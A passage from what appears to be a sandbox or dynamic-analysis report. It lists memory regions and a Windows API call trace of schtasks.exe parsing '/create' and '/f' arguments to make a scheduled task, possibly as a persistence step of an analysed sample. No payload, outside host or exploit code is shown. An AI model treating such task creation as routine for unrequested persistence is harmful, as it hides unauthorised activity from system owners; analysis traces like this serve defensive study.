entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000770000"
filename = ""
Region:
id = 2039
start_va = 0xee0000
end_va = 0x22dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ee0000"
filename = ""
Region:
id = 2040
start_va = 0xe0000
end_va = 0xf1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schtasks.exe.mui"
filename = "\\Windows\\SysWOW64\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\schtasks.exe.mui")
Region:
id = 2041
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 2042
start_va = 0x140000
end_va = 0x140fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 2043
start_va = 0x170000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 2044
start_va = 0x733a0000
end_va = 0x733a8fff
monitored = 0
entry_point = 0x733a1220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 2045
start_va = 0x900000
end_va = 0xbcefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2048
start_va = 0x73a10000
end_va = 0x73a8ffff
monitored = 0
entry_point = 0x73a237c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 2049
start_va = 0x200000
end_va = 0x26ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2050
start_va = 0x330000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000330000"
filename = ""
Region:
id = 2057
start_va = 0x3b0000
end_va = 0x48efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 2058
start_va = 0x4e0000
end_va = 0x5dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 2059
start_va = 0x270000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 2060
start_va = 0xbe0000
end_va = 0xc1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000be0000"
filename = ""
Region:
id = 2061
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 2062
start_va = 0x150000
end_va = 0x150fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000150000"
filename = ""
Region:
id = 2063
start_va = 0x754c0000
end_va = 0x75542fff
monitored = 0
entry_point = 0x754c23d2
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 2064
start_va = 0x160000
end_va = 0x160fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 2065
start_va = 0x6e990000
end_va = 0x6ea0cfff
monitored = 0
entry_point = 0x6e99166a
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll")
Thread:
id = 34
os_tid = 0x3b8
[0170.355] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x13fdd8 | out: lpSystemTimeAsFileTime=0x13fdd8*(dwLowDateTime=0xdf1a6820, dwHighDateTime=0x1d8a8be))
[0170.355] GetCurrentProcessId () returned 0x5e0
[0170.355] GetCurrentThreadId () returned 0x3b8
[0170.355] GetTickCount () returned 0x167016d
[0170.355] RtlQueryPerformanceCounter () returned 0x1
[0170.356] GetModuleHandleA (lpModuleName=0x0) returned 0xeb0000
[0170.356] __set_app_type (_Type=0x1)
[0170.356] __p__fmode () returned 0x754b31f4
[0170.356] __p__commode () returned 0x754b31fc
[0170.356] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xec7881) returned 0x0
[0170.356] __wgetmainargs (in: _Argc=0xed9e6c, _Argv=0xed9e74, _Env=0xed9e70, _DoWildCard=0, _StartInfo=0xed9e80 | out: _Argc=0xed9e6c, _Argv=0xed9e74, _Env=0xed9e70) returned 0
[0170.357] _onexit (_Func=0xed0fe2) returned 0xed0fe2
[0170.357] _onexit (_Func=0xed0ff3) returned 0xed0ff3
[0170.357] _onexit (_Func=0xed1002) returned 0xed1002
[0170.357] _onexit (_Func=0xed101e) returned 0xed101e
[0170.357] _onexit (_Func=0xed103a) returned 0xed103a
[0170.357] _onexit (_Func=0xed1056) returned 0xed1056
[0170.357] _onexit (_Func=0xed1072) returned 0xed1072
[0170.358] _onexit (_Func=0xed108e) returned 0xed108e
[0170.358] _onexit (_Func=0xed10aa) returned 0xed10aa
[0170.358] _onexit (_Func=0xed10c6) returned 0xed10c6
[0170.358] _onexit (_Func=0xed10e2) returned 0xed10e2
[0170.358] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0170.358] WinSqmIsOptedIn () returned 0x0
[0170.359] GetProcessHeap () returned 0x4e0000
[0170.359] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4ef060
[0170.359] SetLastError (dwErrCode=0x0)
[0170.359] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0170.359] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0170.359] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0170.359] VerifyVersionInfoW (in: lpVersionInformation=0x13f850, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x13f850) returned 1
[0170.359] GetProcessHeap () returned 0x4e0000
[0170.359] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4bb8
[0170.359] lstrlenW (lpString="") returned 0
[0170.359] GetProcessHeap () returned 0x4e0000
[0170.359] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x2) returned 0x4f4fa0
[0170.359] GetProcessHeap () returned 0x4e0000
[0170.359] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f4fb0
[0170.359] GetProcessHeap () returned 0x4e0000
[0170.359] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4bd0
[0170.359] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f4fd0
[0170.360] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f4ff0
[0170.360] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5010
[0170.360] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5030
[0170.360] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4be8
[0170.360] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5050
[0170.360] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5070
[0170.360] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5090
[0170.360] GetProcessHeap () returned 0x4e0000
[0170.360] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f50b0
[0170.361] GetProcessHeap () returned 0x4e0000
[0170.361] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4c00
[0170.361] GetProcessHeap () returned 0x4e0000
[0170.361] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f50d0
[0170.361] GetProcessHeap () returned 0x4e0000
[0170.361] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f50f0
[0170.361] GetProcessHeap () returned 0x4e0000
[0170.361] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5128
[0170.361] GetProcessHeap () returned 0x4e0000
[0170.361] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5148
[0170.361] SetThreadUILanguage (LangId=0x0) returned 0x409
[0170.362] SetLastError (dwErrCode=0x0)
[0170.362] GetProcessHeap () returned 0x4e0000
[0170.362] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5168
[0170.362] GetProcessHeap () returned 0x4e0000
[0170.362] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5188
[0170.362] GetProcessHeap () returned 0x4e0000
[0170.362] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f51a8
[0170.362] GetProcessHeap () returned 0x4e0000
[0170.362] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f51c8
[0170.362] GetProcessHeap () returned 0x4e0000
[0170.362] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f51e8
[0170.362] GetProcessHeap () returned 0x4e0000
[0170.362] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4c18
[0170.362] _memicmp (_Buf1=0x4f4c18, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.362] GetProcessHeap () returned 0x4e0000
[0170.362] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x208) returned 0x4f5a90
[0170.362] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f5a90, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0170.363] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x733a0000
[0170.365] GetProcAddress (hModule=0x733a0000, lpProcName="GetFileVersionInfoSizeW") returned 0x733a19d9
[0170.365] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0170.365] GetProcessHeap () returned 0x4e0000
[0170.365] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x74e) returned 0x4f5ca0
[0170.366] GetProcAddress (hModule=0x733a0000, lpProcName="GetFileVersionInfoW") returned 0x733a19f4
[0170.366] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x4f5ca0 | out: lpData=0x4f5ca0) returned 1
[0170.366] GetProcAddress (hModule=0x733a0000, lpProcName="VerQueryValueW") returned 0x733a1b51
[0170.366] VerQueryValueW (in: pBlock=0x4f5ca0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x13f958, puLen=0x13f95c | out: lplpBuffer=0x13f958*=0x4f603c, puLen=0x13f95c) returned 1
[0170.371] _memicmp (_Buf1=0x4f4c18, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.371] _vsnwprintf (in: _Buffer=0x4f5a90, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x13f940 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0170.371] VerQueryValueW (in: pBlock=0x4f5ca0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x13f968, puLen=0x13f964 | out: lplpBuffer=0x13f968*=0x4f5e68, puLen=0x13f964) returned 1
[0170.371] lstrlenW (lpString="schtasks.exe") returned 12
[0170.372] lstrlenW (lpString="schtasks.exe") returned 12
[0170.372] lstrlenW (lpString=".EXE") returned 4
[0170.372] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0170.372] lstrlenW (lpString="schtasks.exe") returned 12
[0170.372] lstrlenW (lpString=".EXE") returned 4
[0170.372] _memicmp (_Buf1=0x4f4c18, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.372] lstrlenW (lpString="schtasks") returned 8
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5228
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5248
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5268
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5288
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4c78
[0170.373] _memicmp (_Buf1=0x4f4c78, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0xa0) returned 0x4f6680
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f52a8
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f52c8
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.373] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f52e8
[0170.373] GetProcessHeap () returned 0x4e0000
[0170.374] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4c90
[0170.374] _memicmp (_Buf1=0x4f4c90, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.374] GetProcessHeap () returned 0x4e0000
[0170.374] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x200) returned 0x4f6728
[0170.374] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x4f6728, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0170.374] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0170.374] GetProcessHeap () returned 0x4e0000
[0170.374] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x30) returned 0x4f6930
[0170.374] _vsnwprintf (in: _Buffer=0x4f6680, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x13f944 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0170.374] GetProcessHeap () returned 0x4e0000
[0170.374] GetProcessHeap () returned 0x4e0000
[0170.374] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5ca0) returned 1
[0170.374] GetProcessHeap () returned 0x4e0000
[0170.374] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5ca0) returned 0x74e
[0170.375] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5ca0 | out: hHeap=0x4e0000) returned 1
[0170.375] SetLastError (dwErrCode=0x0)
[0170.375] GetThreadLocale () returned 0x409
[0170.375] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.375] lstrlenW (lpString="?") returned 1
[0170.375] GetThreadLocale () returned 0x409
[0170.375] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.375] lstrlenW (lpString="create") returned 6
[0170.375] GetThreadLocale () returned 0x409
[0170.375] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.375] lstrlenW (lpString="delete") returned 6
[0170.375] GetThreadLocale () returned 0x409
[0170.375] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.375] lstrlenW (lpString="query") returned 5
[0170.376] GetThreadLocale () returned 0x409
[0170.376] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.376] lstrlenW (lpString="change") returned 6
[0170.376] GetThreadLocale () returned 0x409
[0170.376] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.376] lstrlenW (lpString="run") returned 3
[0170.376] GetThreadLocale () returned 0x409
[0170.376] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.376] lstrlenW (lpString="end") returned 3
[0170.376] GetThreadLocale () returned 0x409
[0170.376] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.376] lstrlenW (lpString="showsid") returned 7
[0170.376] GetThreadLocale () returned 0x409
[0170.376] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0170.376] SetLastError (dwErrCode=0x0)
[0170.376] SetLastError (dwErrCode=0x0)
[0170.376] lstrlenW (lpString="/create") returned 7
[0170.376] lstrlenW (lpString="-/") returned 2
[0170.376] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.376] lstrlenW (lpString="?") returned 1
[0170.377] lstrlenW (lpString="?") returned 1
[0170.377] GetProcessHeap () returned 0x4e0000
[0170.377] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4ca8
[0170.377] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.377] GetProcessHeap () returned 0x4e0000
[0170.377] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0xa) returned 0x4f4cc0
[0170.377] lstrlenW (lpString="create") returned 6
[0170.377] GetProcessHeap () returned 0x4e0000
[0170.377] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x10) returned 0x4f4cd8
[0170.377] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.377] GetProcessHeap () returned 0x4e0000
[0170.377] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0xc, Size=0x14) returned 0x4f5308
[0170.377] _vsnwprintf (in: _Buffer=0x4f4cc0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|?|") returned 3
[0170.377] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|create|") returned 8
[0170.377] lstrlenW (lpString="|?|") returned 3
[0170.377] lstrlenW (lpString="|create|") returned 8
[0170.377] SetLastError (dwErrCode=0x490)
[0170.377] lstrlenW (lpString="create") returned 6
[0170.377] lstrlenW (lpString="create") returned 6
[0170.377] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.378] GetProcessHeap () returned 0x4e0000
[0170.378] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4cc0) returned 1
[0170.378] GetProcessHeap () returned 0x4e0000
[0170.378] RtlReAllocateHeap (Heap=0x4e0000, Flags=0xc, Ptr=0x4f4cc0, Size=0x14) returned 0x4f5328
[0170.378] lstrlenW (lpString="create") returned 6
[0170.378] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.378] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|create|") returned 8
[0170.378] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|create|") returned 8
[0170.378] lstrlenW (lpString="|create|") returned 8
[0170.378] lstrlenW (lpString="|create|") returned 8
[0170.378] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|"
[0170.378] SetLastError (dwErrCode=0x0)
[0170.378] SetLastError (dwErrCode=0x0)
[0170.378] SetLastError (dwErrCode=0x0)
[0170.378] lstrlenW (lpString="/f") returned 2
[0170.378] lstrlenW (lpString="-/") returned 2
[0170.378] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0170.378] lstrlenW (lpString="?") returned 1
[0170.378] lstrlenW (lpString="?") returned 1
[0170.378] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.379] lstrlenW (lpString="f") returned 1
[0170.379] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.379] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|?|") returned 3
[0170.379] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.379] lstrlenW (lpString="|?|") returned 3
[0170.379] lstrlenW (lpString="|f|") returned 3
[0170.379] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0170.379] SetLastError (dwErrCode=0x490)
[0170.379] lstrlenW (lpString="create") returned 6
[0170.379] lstrlenW (lpString="create") returned 6
[0170.379] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.379] lstrlenW (lpString="f") returned 1
[0170.379] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.379] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|create|") returned 8
[0170.379] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.379] lstrlenW (lpString="|create|") returned 8
[0170.379] lstrlenW (lpString="|f|") returned 3
[0170.379] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0170.379] SetLastError (dwErrCode=0x490)
[0170.379] lstrlenW (lpString="delete") returned 6
[0170.379] lstrlenW (lpString="delete") returned 6
[0170.379] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.379] lstrlenW (lpString="f") returned 1
[0170.380] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.380] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|delete|") returned 8
[0170.380] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.380] lstrlenW (lpString="|delete|") returned 8
[0170.380] lstrlenW (lpString="|f|") returned 3
[0170.380] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0
[0170.380] SetLastError (dwErrCode=0x490)
[0170.380] lstrlenW (lpString="query") returned 5
[0170.380] lstrlenW (lpString="query") returned 5
[0170.380] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.380] lstrlenW (lpString="f") returned 1
[0170.380] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.380] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x8, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|query|") returned 7
[0170.380] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.380] lstrlenW (lpString="|query|") returned 7
[0170.380] lstrlenW (lpString="|f|") returned 3
[0170.380] StrStrIW (lpFirst="|query|", lpSrch="|f|") returned 0x0
[0170.380] SetLastError (dwErrCode=0x490)
[0170.380] lstrlenW (lpString="change") returned 6
[0170.380] lstrlenW (lpString="change") returned 6
[0170.380] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.380] lstrlenW (lpString="f") returned 1
[0170.380] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.380] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x9, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|change|") returned 8
[0170.381] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.381] lstrlenW (lpString="|change|") returned 8
[0170.381] lstrlenW (lpString="|f|") returned 3
[0170.381] StrStrIW (lpFirst="|change|", lpSrch="|f|") returned 0x0
[0170.381] SetLastError (dwErrCode=0x490)
[0170.381] lstrlenW (lpString="run") returned 3
[0170.381] lstrlenW (lpString="run") returned 3
[0170.381] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.381] lstrlenW (lpString="f") returned 1
[0170.381] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.381] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|run|") returned 5
[0170.381] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.381] lstrlenW (lpString="|run|") returned 5
[0170.381] lstrlenW (lpString="|f|") returned 3
[0170.381] StrStrIW (lpFirst="|run|", lpSrch="|f|") returned 0x0
[0170.381] SetLastError (dwErrCode=0x490)
[0170.381] lstrlenW (lpString="end") returned 3
[0170.381] lstrlenW (lpString="end") returned 3
[0170.381] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.381] lstrlenW (lpString="f") returned 1
[0170.381] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.381] _vsnwprintf (in: _Buffer=0x4f5328, _BufferCount=0x6, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|end|") returned 5
[0170.381] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.381] lstrlenW (lpString="|end|") returned 5
[0170.381] lstrlenW (lpString="|f|") returned 3
[0170.381] StrStrIW (lpFirst="|end|", lpSrch="|f|") returned 0x0
[0170.382] SetLastError (dwErrCode=0x490)
[0170.382] lstrlenW (lpString="showsid") returned 7
[0170.382] lstrlenW (lpString="showsid") returned 7
[0170.382] _memicmp (_Buf1=0x4f4ca8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.382] GetProcessHeap () returned 0x4e0000
[0170.382] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5328) returned 1
[0170.382] GetProcessHeap () returned 0x4e0000
[0170.382] RtlReAllocateHeap (Heap=0x4e0000, Flags=0xc, Ptr=0x4f5328, Size=0x16) returned 0x4f5348
[0170.382] lstrlenW (lpString="f") returned 1
[0170.382] _memicmp (_Buf1=0x4f4cd8, _Buf2=0xeb1ed8, _Size=0x7) returned 0
[0170.382] _vsnwprintf (in: _Buffer=0x4f5348, _BufferCount=0xa, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|showsid|") returned 9
[0170.382] _vsnwprintf (in: _Buffer=0x4f5308, _BufferCount=0x4, _Format="|%s|", _ArgList=0x13f92c | out: _Buffer="|f|") returned 3
[0170.382] lstrlenW (lpString="|showsid|") returned 9
[0170.382] lstrlenW (lpString="|f|") returned 3
[0170.382] StrStrIW (lpFirst="|showsid|", lpSrch="|f|") returned 0x0
[0170.382] SetLastError (dwErrCode=0x490)
[0170.382] SetLastError (dwErrCode=0x490)
[0170.382] SetLastError (dwErrCode=0x0)
[0170.382] lstrlenW (lpString="/f") returned 2
